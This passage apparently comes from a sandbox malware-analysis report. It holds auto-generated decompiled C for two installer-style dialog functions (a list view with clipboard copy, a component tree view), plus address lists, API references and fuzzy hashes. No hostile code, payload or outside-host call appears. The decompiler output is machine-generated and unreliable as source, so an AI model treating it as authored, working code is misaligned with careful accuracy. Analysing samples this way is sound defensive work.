								_v60 = _t149;
								_v48 = 0x420530;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x4236ec - _t149; // 0x7fffffff
						if(__eflags == 0) {
							ShowWindow( *0x423f24, 8);
							__eflags =  *0x423fac - _t149; // 0x0
							if(__eflags == 0) {
								E00404E9F( *((intOrPtr*)( *0x41fd00 + 0x34)), _t149);
							}
							E00403ECE(1);
							goto L25;
						}
						 *0x41f8f8 = 2;
						E00403ECE(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403F5C(_a8, _a12, _a16);
						}
						ShowWindow( *0x4236f0, _t149);
						ShowWindow(_t154, 8);
						E00403F2A(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f28; // 0x74d188
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x4236f0 = GetDlgItem(_a4, 0x403);
				 *0x4236e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423704 = _t127;
				_v8 = _t127;
				E00403F2A( *0x4236f0);
				 *0x4236f4 = E00404741(4);
				 *0x42370c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403EF5(_a4);
				if(( *0x423f30 & 0x00000003) != 0) {
					ShowWindow( *0x4236f0, _t149);
					if(( *0x423f30 & 0x00000002) != 0) {
						 *0x4236f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F2A( *0x4236e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f30 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}



































                0x00404fe6
                0x00404fec
                0x00404ff5
                0x00404ff8
                0x00405189
                0x00405190
                0x004051b4
                0x004051b4
                0x004051ba
                0x004051c7
                0x004051e5
                0x004051e5
                0x004051ec
                0x00405243
                0x00405243
                0x00405247
                0x00000000
                0x00000000
                0x00405249
                0x0040524c
                0x00000000
                0x00000000
                0x00405256
                0x0040525c
                0x0040525e
                0x00405261
                0x0040535a
                0x00000000
                0x0040535a
                0x00405267
                0x0040526d
                0x0040526f
                0x00405270
                0x0040527c
                0x00405282
                0x00405285
                0x00405288
                0x0040529d
                0x004052a0
                0x004052a0
                0x004052a3
                0x0040528a
                0x0040528f
                0x00405295
                0x00405298
                0x00405298
                0x004052b3
                0x004052bb
                0x004052bc
                0x004052be
                0x004052c7
                0x004052ca
                0x004052d1
                0x004052d8
                0x004052e0
                0x004052e0
                0x004052ee
                0x004052f4
                0x004052f7
                0x004052f7
                0x004052fe
                0x00405304
                0x0040530d
                0x00405314
                0x0040531d
                0x0040531f
                0x00405322
                0x00405331
                0x00405333
                0x00405339
                0x0040533a
                0x0040533b
                0x0040533b
                0x00405343
                0x0040534e
                0x00405354
                0x00405354
                0x00000000
                0x004052be
                0x004051ee
                0x004051f4
                0x00405224
                0x00405226
                0x0040522c
                0x00405237
                0x00405237
                0x0040523e
                0x00000000
                0x0040523e
                0x004051f8
                0x00405202
                0x00000000
                0x004051c9
                0x004051c9
                0x004051cf
                0x00405207
                0x00000000
                0x00405210
                0x004051d8
                0x004051dd
                0x004051e0
                0x00000000
                0x004051e0
                0x004051c7
                0x00404ffe
                0x00405002
                0x0040500b
                0x00405012
                0x00405015
                0x00405018
                0x0040501b
                0x0040501c
                0x0040501d
                0x00405036
                0x00405039
                0x00405043
                0x00405052
                0x0040505a
                0x00405062
                0x00405067
                0x0040506a
                0x00405076
                0x0040507f
                0x00405088
                0x004050ab
                0x004050b1
                0x004050c2
                0x004050c7
                0x004050d5
                0x004050e3
                0x004050e3
                0x004050e8
                0x004050f6
                0x004050f6
                0x004050fb
                0x004050fe
                0x00405103
                0x0040510f
                0x00405118
                0x00405125
                0x00405134
                0x00405127
                0x0040512c
                0x0040512c
                0x00405140
                0x00405140
                0x00405154
                0x0040515d
                0x00405166
                0x00405176
                0x00405182
                0x00405182
                0x00000000

                APIs
                • GetDlgItem.USER32 ref: 0040503C
                • GetDlgItem.USER32 ref: 0040504B
                • GetClientRect.USER32 ref: 00405088
                • GetSystemMetrics.USER32 ref: 00405090
                • SendMessageA.USER32 ref: 004050B1
                • SendMessageA.USER32 ref: 004050C2
                • SendMessageA.USER32 ref: 004050D5
                • SendMessageA.USER32 ref: 004050E3
                • SendMessageA.USER32 ref: 004050F6
                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405118
                • ShowWindow.USER32(?,00000008), ref: 0040512C
                • GetDlgItem.USER32 ref: 0040514D
                • SendMessageA.USER32 ref: 0040515D
                • SendMessageA.USER32 ref: 00405176
                • SendMessageA.USER32 ref: 00405182
                • GetDlgItem.USER32 ref: 0040505A
                  • Part of subcall function 00403F2A: SendMessageA.USER32 ref: 00403F38
                • GetDlgItem.USER32 ref: 0040519F
                • CreateThread.KERNEL32 ref: 004051AD
                • CloseHandle.KERNEL32(00000000), ref: 004051B4
                • ShowWindow.USER32(00000000), ref: 004051D8
                • ShowWindow.USER32(00000000,00000008), ref: 004051DD
                • ShowWindow.USER32(00000008), ref: 00405224
                • SendMessageA.USER32 ref: 00405256
                • CreatePopupMenu.USER32 ref: 00405267
                • AppendMenuA.USER32 ref: 0040527C
                • GetWindowRect.USER32 ref: 0040528F
                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052B3
                • SendMessageA.USER32 ref: 004052EE
                • OpenClipboard.USER32(00000000), ref: 004052FE
                • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405304
                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 0040530D
                • GlobalLock.KERNEL32 ref: 00405317
                • SendMessageA.USER32 ref: 0040532B
                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405343
                • SetClipboardData.USER32(00000001,00000000), ref: 0040534E
                • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 00405354
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                • String ID: {
                • API String ID: 590372296-366298937
                • Opcode ID: b3ec08184f05c81d6d75b8571aa97232ad7eaacc78b900a8a85595b4445b9a13
                • Instruction ID: ce63edb53461e73d1802b3fb2e279853447b443b010abc9b5e4e8924112ec9d2
                • Opcode Fuzzy Hash: b3ec08184f05c81d6d75b8571aa97232ad7eaacc78b900a8a85595b4445b9a13
                • Instruction Fuzzy Hash: 0AA14A70900209BFDB219F60DD89EAE7F79FB08355F00817AFA05BA2A0C7795A41DF59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004047EE Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 94%
                			E004047EE(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f48; // 0x74d334
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f28; // 0x74d188
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f31 & 0x00000002;
							if(( *0x423f31 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E0040476E(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f30; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42050c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x420524;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42050c = _t315;
									 *0x420524 = _t315;
									 *0x423f80 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f31 & 0x00000001;
										if(( *0x423f31 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423f4c - _t315; // 0x3
										_v32 =  *0x420524;
										_t196 =  *0x423f48; // 0x74d334
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x4236fc; // 0x74f2a0
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040468C(0x3ff, 0xfffffffb, E00404741(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x74d33c
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x74d34c
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423f4c; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x420524);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423f80 = _a4;
					_t247 =  *0x423f4c; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420524 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f20, 0x6e);
					 *0x420518 =  *0x420518 | 0xffffffff;
					_v24 = _t250;
					 *0x420520 = SetWindowLongA(_v8, 0xfffffffc, E00404DEF);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42050c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42050c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B16(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403EF5(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403EF5(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423f4c - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420524 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420524 + _t318 * 4) = _t274;
									_t288 =  *( *0x420524 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423f4c; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F2A(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F2A(_v12);
								L89:
								return E00403F5C(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}







































































                0x0040480c
                0x00404812
                0x00404814
                0x0040481a
                0x00404820
                0x00404823
                0x0040482d
                0x00404836
                0x00404839
                0x0040483c
                0x00404a64
                0x00404a64
                0x00404a6b
                0x00404a7f
                0x00404a6d
                0x00404a6f
                0x00404a72
                0x00404a73
                0x00404a7a
                0x00404a7a
                0x00404a82
                0x00404a8b
                0x00404a96
                0x00404a96
                0x00404a99
                0x00404a9c
                0x00404aab
                0x00404aab
                0x00404ab2
                0x00404b2a
                0x00404b2a
                0x00404b2d
                0x00404b2f
                0x00404b32
                0x00404b39
                0x00404b47
                0x00404b47
                0x00404b49
                0x00404b4c
                0x00404b53
                0x00404b55
                0x00404b59
                0x00404b76
                0x00404b7a
                0x00404b7a
                0x00404b5b
                0x00404b68
                0x00404b68
                0x00404b59
                0x00404b53
                0x00000000
                0x00404b2d
                0x00404ab4
                0x00404ab7
                0x00404ac2
                0x00404ac4
                0x00404ac7
                0x00404ace
                0x00404ad3
                0x00404ad5
                0x00404adf
                0x00404adf
                0x00404ae3
                0x00404ae5
                0x00404ae8
                0x00404aea
                0x00404aed
                0x00404b03
                0x00404b03
                0x00404aef
                0x00404aef
                0x00404af5
                0x00404af7
                0x00404afe
                0x00404af9
                0x00404af9
                0x00404af9
                0x00404af7
                0x00404b07
                0x00404b09
                0x00404b0e
                0x00404b17
                0x00404b18
                0x00404b22
                0x00404b22
                0x00404b24
                0x00404b27
                0x00404b27
                0x00404ae8
                0x00000000
                0x00404ad5
                0x00404ab9
                0x00404abc
                0x00404ac0
                0x00000000
                0x00000000
                0x00000000
                0x00404ac0
                0x00404a9e
                0x00404aa5
                0x00000000
                0x00000000
                0x00000000
                0x00404a8d
                0x00404a8d
                0x00404a90
                0x00404b7d
                0x00404b7d
                0x00404b84
                0x00404bf8
                0x00404bf8
                0x00404bff
                0x00404c0b
                0x00404c0b
                0x00404c0d
                0x00404c14
                0x00404c16
                0x00404c1b
                0x00404c1d
                0x00404c20
                0x00404c20
                0x00404c26
                0x00404c2b
                0x00404c2d
                0x00404c30
                0x00404c30
                0x00404c36
                0x00404c3c
                0x00404c42
                0x00404c42
                0x00404c48
                0x00404c4f
                0x00404d9c
                0x00404d9c
                0x00404da3
                0x00404da5
                0x00404dac
                0x00404db0
                0x00404dbd
                0x00404dbd
                0x00404dc0
                0x00404dc6
                0x00404dd8
                0x00404dd8
                0x00404dac
                0x00000000
                0x00404c55
                0x00404c57
                0x00404c5c
                0x00404c5f
                0x00404c63
                0x00404c63
                0x00404c68
                0x00404c6b
                0x00404cac
                0x00404cae
                0x00404cb8
                0x00404cbe
                0x00404cc1
                0x00404cc6
                0x00404ccd
                0x00404cd0
                0x00404d72
                0x00404d78
                0x00404d7e
                0x00404d83
                0x00404d86
                0x00404d97
                0x00404d97
                0x00000000
                0x00404cd6
                0x00404cd6
                0x00404cd6
                0x00404cd9
                0x00404cdf
                0x00404ce2
                0x00404ce4
                0x00404ce6
                0x00404ce8
                0x00404ceb
                0x00404cee
                0x00404cf5
                0x00404cf7
                0x00404cfa
                0x00404d01
                0x00404d04
                0x00404d04
                0x00404d04
                0x00404d04
                0x00404d08
                0x00404d0b
                0x00404d17
                0x00404d18
                0x00404d1b
                0x00404d1d
                0x00404d1d
                0x00404d1d
                0x00404d0d
                0x00404d0f
                0x00404d0f
                0x00404d3c
                0x00404d3c
                0x00404d3d
                0x00404d49
                0x00404d58
                0x00404d58
                0x00404d5a
                0x00404d5d
                0x00404d66
                0x00404d66
                0x00000000
                0x00404cd9
                0x00404c6d
                0x00404c78
                0x00404c7b
                0x00404c80
                0x00404c82
                0x00404c84
                0x00404c86
                0x00404c96
                0x00404ca0
                0x00404ca2
                0x00404ca5
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404c88
                0x00404c88
                0x00404c88
                0x00404c8b
                0x00404c8e
                0x00404c90
                0x00404c90
                0x00404c90
                0x00404c91
                0x00404c92
                0x00404c92
                0x00000000
                0x00404c88
                0x00404c6b
                0x00404c4f
                0x00404b86
                0x00404b8c
                0x00000000
                0x00000000
                0x00404b98
                0x00404b9c
                0x00000000
                0x00000000
                0x00404bac
                0x00404bae
                0x00404bb1
                0x00000000
                0x00000000
                0x00404bc3
                0x00404bc5
                0x00404bc8
                0x00404bd2
                0x00404bd4
                0x00404bd5
                0x00404bd6
                0x00404be5
                0x00404be7
                0x00404bee
                0x00404bf1
                0x00000000
                0x00404bf1
                0x00404bca
                0x00404bcd
                0x00404bd0
                0x00000000
                0x00000000
                0x00000000
                0x00404bd0
                0x00000000
                0x00404a90
                0x00404842
                0x00404847
                0x0040484c
                0x00404851
                0x00404852
                0x0040485b
                0x00404866
                0x00404871
                0x00404877
                0x00404885
                0x0040489a
                0x0040489f
                0x004048aa
                0x004048b3
                0x004048c8
                0x004048d9
                0x004048e6
                0x004048e6
                0x004048eb
                0x004048f1
                0x004048f3
                0x004048f6
                0x004048fb
                0x00404900
                0x00404902
                0x00404902
                0x00404905
                0x00404906
                0x00404922
                0x00404922
                0x00404924
                0x00404925
                0x0040492a
                0x0040492d
                0x00404930
                0x00404934
                0x00404939
                0x0040493e
                0x00404942
                0x00404947
                0x0040494c
                0x0040494e
                0x00404950
                0x00404956
                0x00404a20
                0x00404a33
                0x00000000
                0x0040495c
                0x0040495f
                0x00404962
                0x00404965
                0x00404965
                0x0040496b
                0x00404971
                0x00404974
                0x0040497a
                0x0040497b
                0x00404980
                0x00404989
                0x00404990
                0x00404993
                0x00404996
                0x00404999
                0x004049d3
                0x004049d5
                0x004049fe
                0x004049d7
                0x004049e4
                0x004049e4
                0x0040499b
                0x0040499e
                0x004049ad
                0x004049b7
                0x004049bf
                0x004049c6
                0x004049ce
                0x004049ce
                0x00404999
                0x00404a04
                0x00404a05
                0x00404a0b
                0x00404a11
                0x00404a11
                0x00404a1e
                0x00404a39
                0x00404a3d
                0x00404a5a
                0x00404a5f
                0x00404a62
                0x00404a62
                0x00000000
                0x00404a3f
                0x00404a44
                0x00404a4d
                0x00404dda
                0x00404dec
                0x00404dec
                0x00404a3d
                0x00000000
                0x00404a1e
                0x00404956

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 1638840714-813528018
                • Opcode ID: 7416ecd40991322695bfc66f84475ccc40ce6f5cb9d88326faa3f420c439a296
                • Instruction ID: 4dc87105461fa9cd210088c80ac17c321b9292d6232489b395004e578f78c6e7
                • Opcode Fuzzy Hash: 7416ecd40991322695bfc66f84475ccc40ce6f5cb9d88326faa3f420c439a296
                • Instruction Fuzzy Hash: F0028EB0E00209AFDB20DF54DD45AAE7BB5EB84315F10817AF610BA2E1D7799A81CF58
                Uniqueness

                Uniqueness Score: -1.00%

